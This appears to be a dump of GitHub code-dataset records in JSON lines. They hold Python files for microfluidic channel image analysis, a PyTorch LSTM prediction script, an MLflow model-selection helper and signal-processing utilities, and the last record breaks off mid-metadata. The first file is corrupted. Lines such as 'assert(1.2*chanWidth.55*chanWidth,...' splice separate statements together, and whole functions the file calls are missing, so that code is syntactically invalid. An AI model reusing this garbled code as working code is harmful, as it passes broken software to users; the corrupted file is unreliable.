+{"seq_id": "2598726206", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 17 10:26:20 2017\n\n@author: quentinpeter\n\"\"\"\nimport numpy as np\nimport background_rm as rmbg\nimport image_registration.image as ir\nimport image_registration.channel as cr\nimport diffusion_device.profile as dp\nimport scipy\nimport matplotlib.image as mpimg\nimport warnings\nimport cv2\nfrom scipy import interpolate\nwarnings.filterwarnings('ignore', 'Mean of empty slice',RuntimeWarning)\n\ndef size_images(images,Q,Wz,pixsize,readingpos=None,Rs=None,chanWidth=300e-6,*,\n Zgrid=11,ignore=10e-6,normalize_profiles=True,initmode='none',\n data_dict=None,rebin=2,):\n \"\"\"\n Get the hydrodynamic radius from the images\n \n Parameters\n ----------\n images: 1d list of images or file name OR 2x 1d list\n If this is a string, it will be treated like a path\n If one list, treated like regular fluorescence images\n If two list, treated like images and backgrounds\n Q: float\n Flow rate in [ul/h]\n Wz: float\n Height of the channel in [m]\n pixsize: float\n Pixel size in [m]\n readingpos: 1d float array, defaults None\n Position at which the images are taken. If None, take the defaults\n Rs: 1d array, defaults None\n Hydrodimamic radii to simulate in [m].\n If None: between .5 and 10 nm\n chanWidth: float, default 300e-6\n The channel width in [m]\n Zgrid: int, defaults 11\n Number of Z slices\n ignore: float, defaults 10e-6\n Distance to sides to ignore\n normalize_profiles: Bool, defaults True\n Should the profiles be normalized?\n initmode: str, defaults 'none'\n The processing mode for the initial profile (See profiles.py)\n data_dict: dict, defaults None\n Output to get the profiles and fits\n rebin: int, defaults 2\n Rebin factor to speed up code\n \n Returns\n -------\n r: float\n Radius in [m]\n \n \"\"\"\n \n #Check images is numpy array\n images=np.asarray(images)\n \n #Fill missing arguments\n if readingpos is None:\n readingpos=defaultReading12Pos()\n if Rs is None:\n Rs=np.arange(.5,10,.5)*1e-9\n \n #load images if string\n if images.dtype.type==np.str_:\n if len(np.shape(images))==1:\n images=np.asarray(\n [mpimg.imread(im) for im in images])\n elif len(np.shape(images))==2:\n images=np.asarray(\n [[mpimg.imread(im) for im in ims] for ims in images])\n #Get flat images\n if len(np.shape(images))==3:\n #Single images\n flatimages=np.asarray(\n [flat_image(im,pixsize, chanWidth) \n for im in images])\n elif len(np.shape(images))==4 and np.shape(images)[0]==2:\n #images and background\n flatimages=np.asarray(\n [remove_bg(im,bg,pixsize, chanWidth) \n for im,bg in zip(images[0],images[1])])\n \n if rebin>1: \n size=tuple(np.array(np.shape(flatimages)[1:])//rebin)\n flatimages=np.array([cv2.resize(im,size,interpolation=cv2.INTER_AREA)\n for im in flatimages])\n pixsize*=rebin \n \n #get profiles\n profiles=np.asarray(\n [extract_profile(fim,pixsize, chanWidth) for fim in flatimages])\n \n if data_dict is not None:\n data_dict['pixsize']=pixsize\n data_dict['profiles']=profiles \n\n return dp.size_profiles(profiles,Q,Wz,pixsize,readingpos,Rs,\n initmode=initmode,normalize_profiles=normalize_profiles,\n Zgrid=Zgrid, ignore=ignore,data_dict=data_dict)\n \n\ndef remove_bg(im,bg, pixsize, chanWidth=300e-6):\n \"\"\"\n Remove background from image\n \n Parameters\n ----------\n im: 2d array\n image \n bg: 2d array\n background\n pixsize: float\n pixel size in [m]\n chanWidth: float, defaults 300e-6\n channel width in [m]\n \n Returns\n -------\n im: 2d array\n The processed image\n \n \"\"\"\n 
im=np.array(im,dtype=float)\n bg=np.array(bg,dtype=float)\n #remove dust peaks on images\n bg[rmbg.getPeaks(bg, maxsize=50*50)]=np.nan\n im[rmbg.getPeaks(im, maxsize=50*50)]=np.nan \n \n #Get the X positions (perpendicular to alignent axis) and check wide enough\n X=np.arange(im.shape[1])*pixsize\n assert(1.2*chanWidth.55*chanWidth,np.isfinite(prof))\n \n if reflatten:\n #fit ignoring extreme 10 pix\n fit=np.polyfit(X[out][ignore:-ignore],prof[out][ignore:-ignore],2)\n bgfit=fit[0]*X**2+fit[1]*X+fit[2]\n \n #Flatten the profile\n prof=(prof+1)/(bgfit+1)-1\n\n #We restrict the profile to channel width - widthcut\n Npix=int(chanWidth//pixsize)+1\n \n Xc=np.arange(Npix)-(Npix-1)/2\n Xc*=pixsize\n \n finterp=interpolate.interp1d(X, prof,bounds_error=False,fill_value=0)\n \"\"\"\n from matplotlib.pyplot import figure, imshow,plot\n figure()\n plot(X,prof)\n #\"\"\" \n return finterp(Xc)\n \n \n \"\"\"\n from matplotlib.pyplot import figure, imshow,plot\n figure()\n imshow(flatim)\n plot([c-Npix//2,c-Npix//2],[5,np.shape(flatim)[0]-5],'r')\n plot([c+Npix//2,c+Npix//2],[5,np.shape(flatim)[0]-5],'r')\n figure()\n pr=np.nanmean(flatim,0)\n plot(pr)\n plot([c-Npix//2,c-Npix//2],[np.nanmin(pr),np.nanmax(pr)],'r')\n plot([c+Npix//2,c+Npix//2],[np.nanmin(pr),np.nanmax(pr)],'r')\n #\"\"\" \n \n# return prof[channel]\n \ndef defaultReading12Pos():\n '''\n Get the default reading positions for the 12 points diffusion device\n \n Returns\n -------\n readingPos: 1d array\n The reading positions\n '''\n return np.array([0,\n 3.5,\n 5.3,\n 8.6,\n 10.3,\n 18.6,\n 20.4,\n 28.6,\n 30.4,\n 58.7,\n 60.5,\n 88.7,\n 90.5])*1e-3 \n \ndef outChannelMask(im, chAngle=0):\n \"\"\"Creates a mask that excludes the channel\n \n Parameters\n ----------\n im: 2d array\n The image\n chAngle: number\n The angle of the channel in radians\n \n Returns\n -------\n mask: 2d array\n the mask excluding the channel\n \n Notes\n -----\n The channel should be clear(ish) on the image. 
\n The angle should be aligned with the channel\n \n\n \"\"\"\n im=np.array(im,dtype='float32')\n #Remove clear dust\n mask=rmbg.backgroundMask(im, nstd=6)\n im[~mask]=np.nan\n \n #get edge\n scharr=cr.Scharr_edge(im)\n #Orientate image along x if not done\n if chAngle !=0:\n scharr= ir.rotate_scale(scharr, -chAngle,1,np.nan)\n \n #get profile\n prof=np.nanmean(scharr,1)\n #get threshold\n threshold=np.nanmean(prof)+3*np.nanstd(prof)\n mprof=prof>threshold\n edgeargs=np.flatnonzero(mprof)\n \n if edgeargs.size > 2:\n mask=np.zeros(im.shape)\n mask[edgeargs[0]-5:edgeargs[-1]+5,:]=2\n if chAngle !=0:\n mask= ir.rotate_scale(mask, chAngle,1,np.nan)\n mask=np.logical_and(mask<1, np.isfinite(im))\n else:\n mask= None\n return mask\n \ndef outGaussianBeamMask(data, chAngle=0):\n \"\"\"\n get the outside of the channel from a gaussian fit\n \n Parameters\n ----------\n data: 2d array\n The image\n chAngle: number\n The angle of the channel in radians\n \n Returns\n -------\n mask: 2d array\n the mask excluding the channel\n \n \"\"\"\n data=np.asarray(data)\n \n #Filter to be used\n gfilter=scipy.ndimage.filters.gaussian_filter1d\n \n #get profile\n if chAngle!=0:\n data=ir.rotate_scale(data, -chAngle,1,np.nan)\n profile=np.nanmean(data,1)\n \n #guess position of max\n amax= profile.size//2\n \n #get X and Y\n X0=np.arange(profile.size)-amax\n Y0=profile\n \n #The cutting values are when the profiles goes below zero\n rlim=np.flatnonzero(np.logical_and(Y0<0,X0>0))[0]\n llim=np.flatnonzero(np.logical_and(Y0<0,X0<0))[-1]\n \n #We can now detect the true center\n fil=gfilter(profile,21)\n X0=X0-X0[np.nanargmax(fil[llim:rlim])]-llim\n \n #restrict to the correct limits\n X=X0[llim:rlim]\n Y=Y0[llim:rlim]-np.nanmin(Y0)\n \n #Fit the log, which should be a parabola\n c=np.polyfit(X,np.log(Y),2)\n \n #Deduce the variance\n var=-1/(2*c[0])\n \n #compute the limits (3std, restricted to half the image)\n mean=np.nanargmax(fil[llim:rlim])+llim\n dist=int(3*np.sqrt(var))\n if dist > profile.size//4:\n dist = profile.size//4\n llim=mean-dist\n if llim < 0:\n return None\n rlim=mean+dist\n if rlim>profile.size:\n return None\n \n #get mask\n mask=np.ones(data.shape)\n \n if chAngle!=0:\n idx=np.indices(mask.shape)\n \n \n idx[1]-=mask.shape[1]//2\n idx[0]-=mask.shape[0]//2\n X=np.cos(chAngle)*idx[1]+np.sin(chAngle)*idx[0]\n Y=np.cos(chAngle)*idx[0]-np.sin(chAngle)*idx[1]\n \n mask[np.abs(Y-mean+mask.shape[0]//2).5, np.isfinite(data))\n mask=mask>.5\n return mask\n \n \"\"\"\n import matplotlib.pyplot as plt\n plt.figure()\n #plot profile and fit\n valmax=np.nanmax(Y)\n plt.plot(X0,Y0)\n plt.plot(X0,valmax*np.exp(-(X0**2)/(2*var))+np.nanmin(Y0))\n plt.plot([llim-mean,llim-mean],[np.nanmin(Y0),np.nanmax(Y0)],'r')\n plt.plot([rlim-mean,rlim-mean],[np.nanmin(Y0),np.nanmax(Y0)],'r')\n #\"\"\"\n\n", "repo_name": "impact27/diffusionalSizing", "sub_path": "lib/diffusion_device/channel_image.py", "file_name": "channel_image.py", "file_ext": "py", "file_size_in_byte": 12119, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "warnings.filterwarnings", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.str_", "line_number": 74, "usage_type": "attribute"}, {"api_name": "numpy.shape", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 76, "usage_type": 
"call"}, {"api_name": "matplotlib.image.imread", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.image", "line_number": 77, "usage_type": "name"}, {"api_name": "numpy.shape", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.image.imread", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.image", "line_number": 80, "usage_type": "name"}, {"api_name": "numpy.shape", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 95, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 95, "usage_type": "call"}, {"api_name": "cv2.INTER_AREA", "line_number": 95, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 100, "usage_type": "call"}, {"api_name": "diffusion_device.profile.size_profiles", "line_number": 107, "usage_type": "call"}, {"api_name": "diffusion_device.profile", "line_number": 107, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 134, "usage_type": "call"}, {"api_name": "background_rm.getPeaks", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 136, "usage_type": "attribute"}, {"api_name": "background_rm.getPeaks", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 137, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.absolute", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 147, "usage_type": "call"}, {"api_name": "background_rm.remove_curve_background", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 172, "usage_type": "call"}, {"api_name": "background_rm.getPeaks", "line_number": 174, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 174, "usage_type": "attribute"}, {"api_name": "diffusion_device.profile.image_angle", "line_number": 176, "usage_type": "call"}, {"api_name": "diffusion_device.profile", "line_number": 176, "usage_type": "name"}, {"api_name": "numpy.nanmedian", "line_number": 176, "usage_type": "call"}, {"api_name": "image_registration.image.rotate_scale", "line_number": 177, "usage_type": "call"}, {"api_name": "image_registration.image", "line_number": 177, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 177, "usage_type": "attribute"}, {"api_name": "numpy.nanmean", "line_number": 180, "usage_type": "call"}, {"api_name": "numpy.nanmedian", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 182, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 183, "usage_type": "call"}, {"api_name": "diffusion_device.profile.center", "line_number": 183, "usage_type": "call"}, {"api_name": "diffusion_device.profile", "line_number": 183, "usage_type": "name"}, {"api_name": "numpy.abs", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 188, "usage_type": "call"}, 
{"api_name": "background_rm.polyfit2d", "line_number": 192, "usage_type": "call"}, {"api_name": "image_registration.image.rotate_scale", "line_number": 229, "usage_type": "call"}, {"api_name": "image_registration.image", "line_number": 229, "usage_type": "name"}, {"api_name": "diffusion_device.profile.image_angle", "line_number": 229, "usage_type": "call"}, {"api_name": "diffusion_device.profile", "line_number": 229, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 230, "usage_type": "attribute"}, {"api_name": "numpy.nanmean", "line_number": 232, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 235, "usage_type": "call"}, {"api_name": "diffusion_device.profile.center", "line_number": 236, "usage_type": "call"}, {"api_name": "diffusion_device.profile", "line_number": 236, "usage_type": "name"}, {"api_name": "numpy.abs", "line_number": 237, "usage_type": "call"}, {"api_name": "diffusion_device.profile.center", "line_number": 238, "usage_type": "call"}, {"api_name": "diffusion_device.profile", "line_number": 238, "usage_type": "name"}, {"api_name": "numpy.argmax", "line_number": 238, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 241, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 241, "usage_type": "call"}, {"api_name": "numpy.isfinite", "line_number": 241, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 254, "usage_type": "call"}, {"api_name": "scipy.interpolate.interp1d", "line_number": 257, "usage_type": "call"}, {"api_name": "scipy.interpolate", "line_number": 257, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 290, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 326, "usage_type": "call"}, {"api_name": "background_rm.backgroundMask", "line_number": 328, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 329, "usage_type": "attribute"}, {"api_name": "image_registration.channel.Scharr_edge", "line_number": 332, "usage_type": "call"}, {"api_name": "image_registration.channel", "line_number": 332, "usage_type": "name"}, {"api_name": "image_registration.image.rotate_scale", "line_number": 335, "usage_type": "call"}, {"api_name": "image_registration.image", "line_number": 335, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 335, "usage_type": "attribute"}, {"api_name": "numpy.nanmean", "line_number": 338, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 340, "usage_type": "call"}, {"api_name": "numpy.nanstd", "line_number": 340, "usage_type": "call"}, {"api_name": "numpy.flatnonzero", "line_number": 342, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 345, "usage_type": "call"}, {"api_name": "image_registration.image.rotate_scale", "line_number": 348, "usage_type": "call"}, {"api_name": "image_registration.image", "line_number": 348, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 348, "usage_type": "attribute"}, {"api_name": "numpy.logical_and", "line_number": 349, "usage_type": "call"}, {"api_name": "numpy.isfinite", "line_number": 349, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 371, "usage_type": "call"}, {"api_name": "scipy.ndimage", "line_number": 374, "usage_type": "attribute"}, {"api_name": "image_registration.image.rotate_scale", "line_number": 378, "usage_type": "call"}, {"api_name": "image_registration.image", "line_number": 378, "usage_type": "name"}, {"api_name": "numpy.nan", 
"line_number": 378, "usage_type": "attribute"}, {"api_name": "numpy.nanmean", "line_number": 379, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 385, "usage_type": "call"}, {"api_name": "numpy.flatnonzero", "line_number": 389, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 389, "usage_type": "call"}, {"api_name": "numpy.flatnonzero", "line_number": 390, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 390, "usage_type": "call"}, {"api_name": "numpy.nanargmax", "line_number": 394, "usage_type": "call"}, {"api_name": "numpy.nanmin", "line_number": 398, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 401, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 401, "usage_type": "call"}, {"api_name": "numpy.nanargmax", "line_number": 407, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 408, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 419, "usage_type": "call"}, {"api_name": "numpy.indices", "line_number": 422, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 427, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 427, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 428, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 428, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 430, "usage_type": "call"}]}
+{"seq_id": "18424587", "text": "# used below link for vgg16 as feature extractor\n# https://www.kaggle.com/carloalbertobarbano/vgg16-transfer-learning-pytorch\n# https://stackoverflow.com/questions/45022734/understanding-a-simple-lstm-pytorch\nimport torch.optim as optim\nfrom torch.utils.data import Dataset\nfrom torch.utils.data import DataLoader\nfrom torch import nn\nimport torchvision.models as models\nimport numpy as np\nimport pickle as pkl\nimport torch\nimport os\nfrom sklearn.metrics import accuracy_score, precision_score, recall_score\nfrom utils import PlotConfusionMatrix, PlotLoss, PlotAccuracy\n\nDATA_DIR_ROOT = \"../data/MIRACL_VC1/\"\nRESULTS_DIR_ROOT = \"../results/\"\nTEST_DATA = \"test_resnet50_feats_SEEN.pkl\"\n\nBATCH_SIZE = 16\nTIME_STEPS = 5\nN_CLASS = 10\n\nclass MIRACL_VC1_FEAT(Dataset):\n\tdef __init__(self,data):\n\t\tself.X = data['feats']\n\t\tself.Y = data['labels']\n\n\tdef __len__(self):\n\t\treturn len(self.X)\n\n\tdef __getitem__(self,idx):\n\t\treturn [self.X[idx], self.Y[idx]]\n\ndef get_data(path):\n\twith open(path,'rb') as f:\n\t\tdata = pkl.load(f)\n\tprint(\"DATA Instances : \",len(data['labels']))\n\tdataset = MIRACL_VC1_FEAT(data)\n\treturn dataset\n\nclass TOP_LSTM(nn.Module):\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.feat_dim = 2048\n\n\t\tself.lstm1 = nn.LSTM(input_size = self.feat_dim, hidden_size = 1, bidirectional = True)\n\t\tself.processOut = nn.Linear(TIME_STEPS*2,N_CLASS)\n\t\tself.classifier = nn.Softmax()\n\n\tdef forward(self,input):\n\t\tout,_ = self.lstm1(input.reshape(TIME_STEPS,BATCH_SIZE,self.feat_dim))\n\t\tout = out.permute(1,0,2)\n\t\tout = torch.flatten(out,1)\n\t\tscores = self.processOut(out)\n\t\tlabels = self.classifier(scores).argmax(axis=1)\n\t\treturn scores,labels\n\nprint(\"load model\")\nmodel = TOP_LSTM()\nmodel.load_state_dict(torch.load(RESULTS_DIR_ROOT+\"resnet50_checkpoint_lstm_SEEN.p\"))\n\ntest_dataset = get_data(DATA_DIR_ROOT + TEST_DATA)\ntest_data_dl = DataLoader(test_dataset, batch_size = BATCH_SIZE * TIME_STEPS, drop_last=True)\n\ntest_accuracy_trace = []\ncriterion = nn.CrossEntropyLoss()\nprint(\"Start testing\")\nmodel.eval()\ntest_loss = 0\ntest_words_pred = []\ntest_words_true = []\nfor i,(feats,labels) in enumerate(test_data_dl):\n\tscores,pred_labels = model(feats)\n\ttrue_labels = labels.reshape(TIME_STEPS,BATCH_SIZE)[-1,:]\n\tloss = criterion(scores,true_labels)\n\ttest_loss+=loss.item()\n\n\ttest_words_true = test_words_true + true_labels.tolist()\n\ttest_words_pred = test_words_pred + pred_labels.tolist()\n\ntest_acc = accuracy_score(test_words_true,test_words_pred)\nprint(\"prediction_loss = \",test_loss/i)\nprint(\"prediction accuracy_score = \", test_acc)\nprint(\"\\n\")\n\nPlotConfusionMatrix(test_words_true,test_words_pred,np.arange(N_CLASS),\"pred_conf_mat.jpg\",title = \"pred confusion matrix\")\n", "repo_name": "SkinnP1/CS763-ComputerVision", "sub_path": "Project/code/predict.py", "file_name": "predict.py", "file_ext": "py", "file_size_in_byte": 2675, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "torch.utils.data.Dataset", "line_number": 24, "usage_type": "name"}, {"api_name": "pickle.load", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 42, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 42, "usage_type": "name"}, {"api_name": "torch.nn.LSTM", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 
47, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.nn.Softmax", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 49, "usage_type": "name"}, {"api_name": "torch.flatten", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 67, "usage_type": "name"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 82, "usage_type": "call"}, {"api_name": "utils.PlotConfusionMatrix", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 87, "usage_type": "call"}]}
+{"seq_id": "21289612953", "text": "\"\"\"\ncode for SKlearn cross validation\n\"\"\"\n\nfrom sklearn.linear_model import LogisticRegression, LinearRegression, Ridge, Lasso\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.ensemble import RandomForestRegressor\nimport xgboost as xgb\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.model_selection import GridSearchCV\n# import mlflow.sklearn\n# from mlflow.models.signature import infer_signature\nimport tensorflow as tf\nfrom tensorflow.keras import layers\nfrom tensorflow.keras import losses\n\n\nimport mlflow\n\n\n\n\n# train on subset of data and find best hyperparameters. then train a model using all the data on those\n# parameters.return that as best model\n\ndef get_sk_learn_best_model(X_train, y_train, specs, method, learners):\n\n # from sklearn.linear_model import LogisticRegression, LinearRegression, Ridge, Lasso\n # from sklearn.tree import DecisionTreeRegressor\n # from sklearn.ensemble import RandomForestRegressor\n # import xgboost as xgb\n # from sklearn.metrics import mean_absolute_error\n # from sklearn.model_selection import GridSearchCV\n\n with mlflow.start_run() as run:#run_id=\"Linear_Regression\"\n mlflow.autolog()\n \n # lr = LinearRegression()\n # regressor = specs['methods'][method]['learner']\n regressor = learners[method]\n param_grid = specs['methods'][method]['param_grid']\n clf_gs = GridSearchCV(regressor, param_grid=param_grid, scoring='neg_median_absolute_error', n_jobs=10, verbose=2)\n clf_gs.fit(X_train, y_train)\n print(run.info.run_id, clf_gs.best_params_)\n \n return(clf_gs.best_estimator_, run.info.run_id)\n\ndef get_keras_01_best_model(X_train, y_train, specs, method, learners):\n\n # import tensorflow as tf\n # from tensorflow.keras import layers\n # from tensorflow.keras import losses\n\n input_size = X_train.shape[1]\n model = tf.keras.Sequential([\n layers.Dense(2*input_size, activation='relu', input_shape=(input_size,)),\n layers.Dense(20, activation='relu'),\n layers.Dense(1)\n ])\n\n model.compile(loss=tf.keras.losses.MeanAbsoluteError())#, metrics=[tf.keras.metrics.Recall()])\n with mlflow.start_run() as run:#run_id=\"Linear_Regression\"\n mlflow.autolog()\n model.fit(X_train, y_train, epochs=10)#, validation_split=0.2)\n \n return(model, run.info.run_id)\n\n\n#add tags for mlfow tracking server\n# some way to multiprocess decsion trees\n\ndef get_best_model(X_train, y_train, specs, method, learners):\n print(\"method: \", method)\n\n #choose best model function based on on method i.e. 
if method in [list of ]\n fit_function = specs['methods'][method]['fit-function']\n \n #fit functions\n # sk_learn_methods = ['Linear Regression', 'Lasso Regression', 'Ridge Regression','XG Boost Regression']\n # keras_methods = []\n\n\n if fit_function == \"scikit learn\":\n print(\"fit-function\", fit_function, \"\\n\\n\")\n return get_sk_learn_best_model(X_train, y_train, specs, method, learners) \n elif fit_function == \"keras 01\":\n print(\"fit-function\", fit_function)\n return get_keras_01_best_model(X_train, y_train, specs, method, learners) \n\n ", "repo_name": "kaiomurz/mlflow-framework", "sub_path": "get_best_model.py", "file_name": "get_best_model.py", "file_ext": "py", "file_size_in_byte": 3185, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "mlflow.start_run", "line_number": 35, "usage_type": "call"}, {"api_name": "mlflow.autolog", "line_number": 36, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 42, "usage_type": "call"}, {"api_name": "tensorflow.keras.Sequential", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 55, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 56, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 56, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 57, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 57, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 58, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 58, "usage_type": "name"}, {"api_name": "tensorflow.keras.losses.MeanAbsoluteError", "line_number": 61, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 61, "usage_type": "attribute"}, {"api_name": "mlflow.start_run", "line_number": 62, "usage_type": "call"}, {"api_name": "mlflow.autolog", "line_number": 63, "usage_type": "call"}]}
+{"seq_id": "8950698531", "text": "import numpy as np\r\nimport torch\r\nfrom numba import jit, prange\r\nimport matplotlib.pyplot as plt\r\n\r\ndef plot_signals(signals, samples=None, start=0, title=None):\r\n for name, s in signals.items():\r\n if samples is None:\r\n x_labels = np.linspace(0, s.shape[0], s.shape[0])\r\n plt.plot(x_labels, s, label=name)\r\n else:\r\n assert samples + start <= s.shape[0]\r\n x_labels = np.linspace(start, start+samples, samples)\r\n plt.plot(x_labels, s[start:start+samples], label=name)\r\n \r\n if title is not None:\r\n plt.title(title)\r\n plt.legend()\r\n plt.show()\r\n return None\r\n\r\n@jit(nopython=True, cache=True, parallel=True)\r\ndef pre_emphasis(signal, coefficient = 0.95):\r\n return np.append(signal[0],signal[1:] - coefficient*signal[:-1])\r\n\r\n@jit(nopython=True, cache=True)\r\ndef is_power_of_2(num):\r\n return (num & (num-1) == 0) and num != 0\r\n\r\ndef smallest_greater_pow2(num):\r\n return 1<<(num-1).bit_length()\r\n\r\ndef make_frames(x, frame_length, hop_length):\r\n num_frames = 1 + int(np.ceil((x.size(0) - frame_length) / hop_length))\r\n indices = np.tile(np.arange(0, frame_length), (num_frames, 1)) + np.tile(np.arange(0, num_frames*hop_length, hop_length), (frame_length, 1)).T\r\n indices = np.array(indices, dtype=np.int32)\r\n\r\n # slice signal into frames\r\n frames = x[indices.T]\r\n return frames\r\n\r\n@torch.jit.script\r\ndef torch_MAD(x):\r\n x = x.abs()\r\n return torch.median(torch.abs(x - torch.median(x)))\r\n\r\n@torch.jit.script\r\ndef find_closest(a, v):\r\n '''\r\n Equivalent to argmin(abs(a[i, j] - v)) for all i, j; a is 2D, v is 1D.\r\n Credit: Divakar -- https://stackoverflow.com/a/64526158/10133797\r\n '''\r\n sidx = v.argsort()\r\n v_s = v[sidx]\r\n idx = torch.searchsorted(v_s, a)\r\n idx[idx == len(v)] = len(v) - 1\r\n idx0 = (idx-1).clip(min=0)\r\n\r\n m = torch.abs(a - v_s[idx]) >= torch.abs(v_s[idx0] - a)\r\n m[idx == 0] = 0\r\n idx[m] -= 1\r\n out = sidx[idx]\r\n return out\r\n\r\ndef indexed_sum(a, k):\r\n '''\r\n Sum `a` into rows of 2D array according to indices given by 2D `k`.\r\n '''\r\n out = np.zeros(a.shape, dtype=a.dtype)\r\n _parallel_indexed_sum(a, k, out)\r\n return out\r\n@jit(nopython=True, cache=True, parallel=True)\r\ndef _parallel_indexed_sum(a, k, out):\r\n for j in prange(a.shape[1]):\r\n for i in prange(a.shape[0]):\r\n out[k[i, j], j] += a[i, j]", "repo_name": "YinPing-Cho/Simple-Synchrosqueezing", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 2419, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "numpy.linspace", "line_number": 9, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 10, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", 
